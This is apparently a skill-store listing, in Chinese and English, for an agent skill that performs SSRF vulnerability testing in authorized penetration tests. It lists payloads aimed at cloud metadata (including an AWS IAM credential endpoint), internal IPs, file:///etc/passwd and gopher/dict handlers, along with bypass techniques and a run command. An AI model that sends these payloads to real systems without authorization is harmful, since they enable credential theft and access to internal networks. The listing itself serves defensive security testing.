服务器端请求伪造测试

v20260317

performing-ssrf-vulnerability-exploitation

通过控制 URL 参数访问云元数据、内网服务与协议处理器，分析响应以确认信息泄露或内网访问，最终生成 SSRF 漏洞评估报告，适用于授权渗透测试场景。

SSRF 安全测试云渗透漏洞利用元数据

获取技能

261 次下载

概览

Instructions

Install dependencies: pip install requests
Identify URL parameters in the target application that accept URLs or hostnames.
Test SSRF payloads:
- Cloud metadata: http://169.254.169.254/latest/meta-data/
- Internal services: http://127.0.0.1:port/, http://10.0.0.1/
- Protocol handlers: file:///etc/passwd, gopher://, dict://
- Bypass techniques: IP encoding, DNS rebinding, URL redirects
Analyze responses for information disclosure or internal access confirmation.
Generate a vulnerability assessment report.

# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json

Examples

AWS Metadata SSRF

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.

信息

Category 编程开发

Name performing-ssrf-vulnerability-exploitation

版本 v20260317

大小 8.47KB

Source mukul975/Anthropic-Cybersecurity-Skills

更新时间 2026-03-18